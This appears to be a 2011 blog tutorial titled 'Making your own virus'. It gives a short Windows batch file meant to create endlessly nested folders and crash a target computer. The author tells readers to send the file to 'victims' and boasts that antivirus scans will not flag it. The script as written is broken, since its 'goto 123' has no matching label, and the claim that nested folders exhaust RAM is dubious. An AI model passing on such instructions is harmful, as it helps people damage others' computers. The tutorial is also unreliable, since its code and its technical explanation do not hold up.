Tuesday, 2 August 2011

Making your own virus

Viruses are malicious programs designed to corrupt or destroy healthy programs or delete data and cause computer mayhem. Viruses come is different forms and are programmed for variety of purposes ranging from sheer destruction to massive infections and botnet creations. In this tutorial I will design a simple virus
that is capable of crashing the RAM of the target system.


  1. A windows computer.
  2. Notepad.


We will use Notepad for writing the code of our virus. Follow these steps.


  1. Open Notepad.
  2. Type the following code.
    md virus
    cd virus
    goto 123 
3.   Save the file as virus.bat (The .bat extension is really important otherwise the program won't work).
4. You can run a virus scan on this file, I'm sure it won't give an alert. If it does, please let me know.

You are done. You can send this file to your victims, when they double click on the file, they will get infected.

The Virus creates a folder named virus and creates another folder named virus inside the virus folder and keep doing it until it is stopped. It can create approximately create 100 folders in 4 seconds one inside the other. This consumes too much RAM of the computer forcing it to crash.

Virus Removal
Removing the virus is very easy. Just delete the virus.bat file and its gone forever.

Warning: Do not run the virus on your own computer. I am not responsible in anyway for the damage done due to use of this virus. Handle with care.

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